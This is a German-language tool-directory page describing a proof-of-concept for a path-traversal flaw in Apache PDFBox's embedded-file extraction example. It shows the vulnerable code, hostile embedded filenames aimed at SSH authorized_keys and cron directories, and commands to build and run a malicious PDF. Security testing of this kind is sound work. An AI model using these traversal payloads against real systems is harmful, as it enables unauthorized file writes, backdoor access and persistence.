Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23907 — Proof-of-Concept-Exploit für die Apache-PDFBox-Path-Traversal-Schwachstelle (CVE-2026-23907), die das beliebige Schreiben von Dateien über bösartige PDFs mit eingebetteten Dateien demonstriert. | Kitploit
Tools/GitHubGitHub/joakimbulow/cve-2026-23907
SchwachstellenanalyseExploitationWebanwendungs-ExploitationMalware-AnalysePenetrationstestsBinäranalyse
GitHubjoakimbulow/cve-2026-23907

CVE-2026-23907

Proof-of-Concept-Exploit für die Apache-PDFBox-Path-Traversal-Schwachstelle (CVE-2026-23907), die das beliebige Schreiben von Dateien über bösartige PDFs mit eingebetteten Dateien demonstriert.

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Apache PDFBox Path Traversal Schwachstelle

Zusammenfassung der Schwachstelle

Beschreibung

Der Beispielcode ExtractEmbeddedFiles von Apache PDFBox bereinigt Dateinamen beim Extrahieren eingebetteter Dateien aus PDFs nicht. Ein Angreifer kann Dateien mit Pfad-Traversal-Sequenzen (../) einbetten, um Dateien an beliebigen Dateisystempfaden zu schreiben.

Verwundbarer Code

Datei: pdfbox/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/ExtractEmbeddedFiles.java

root@kitploit:~
private static void extractFile(String filePath, String filename, PDEmbeddedFile embeddedFile)
        throws IOException
{
    String embeddedFilename = filePath + filename;  // NO SANITIZATION
    File file = new File(embeddedFilename);
    File parentDir = file.getParentFile();
    if (!parentDir.exists())
    {
        parentDir.mkdirs();  // Creates arbitrary directories
    }
    try (FileOutputStream fos = new FileOutputStream(file))
    {
        fos.write(embeddedFile.toByteArray());  // Writes to arbitrary location
    }
}

Der Parameter filename stammt direkt aus der PDF ohne Validierung.

Auswirkungen

  • Beliebiges Dateischreiben: Dateien überall dort schreiben, wo die Anwendung Berechtigungen hat
  • Rechteausweitung: SSH-Schlüssel, Konfigurationsdateien überschreiben
  • Remote-Code-Ausführung: Ausführbare Dateien, Cron-Jobs, systemd-Dienste überschreiben
  • Datenzerstörung: Kritische Systemdateien überschreiben

Angriffsszenarien

  1. SSH-Schlüssel-Injektion

    • Eingebetteter Dateiname: ../../.ssh/authorized_keys
    • Inhalt: Öffentlicher Schlüssel des Angreifers
    • Ergebnis: SSH-Zugriff
  2. Cron-Job-Injektion

    • Eingebetteter Dateiname: ../../../etc/cron.d/malicious
    • Inhalt: Bösartiges Skript
    • Ergebnis: Rechteausweitung + Persistenz
  3. Konfigurationsüberschreibung

    • Eingebetteter Dateiname: ../../config/database.yml
    • Inhalt: Bösartige Anmeldedaten
    • Ergebnis: Datenerfassung

Proof of Concept

Enthaltene Dateien

  • create_malicious_pdf.py - Erzeugt bösartige PDF mit Pfad-Traversal
  • TestPathTraversal.java - Demonstriert die Schwachstelle
  • test_path_traversal.sh - Automatisiertes Testskript
  • malicious_path_traversal.pdf - Vorgenerierte bösartige PDF

Ausführen des PoC

Schnelltest

root@kitploit:~
./test_path_traversal.sh

Manueller Test

root@kitploit:~
# 1. Bösartige PDF erzeugen
python3 create_malicious_pdf.py

# 2. Test kompilieren (erfordert PDFBox-JAR)
javac -cp pdfbox-app.jar TestPathTraversal.java

# 3. Test ausführen
java -cp .:pdfbox-app.jar TestPathTraversal malicious_path_traversal.pdf

# 4. Pfad-Traversal verifizieren
cat /tmp/path_traversal_poc

Erwartete Ausgabe

root@kitploit:~
PATH TRAVERSAL DETECTED!
Expected path prefix: /current/working/directory
Actual path: /tmp/path_traversal_poc

Betroffene Versionen

  • Apache PDFBox 3.0.6 - Als verwundbar bestätigt

Betroffene Komponenten

  • Beispielcode ExtractEmbeddedFiles.java
  • Anwendungen, die ähnliche Muster verwenden
  • Jeder Code, der PDComplexFileSpecification.getFilename() ohne Bereinigung aufruft
Tool herunterladen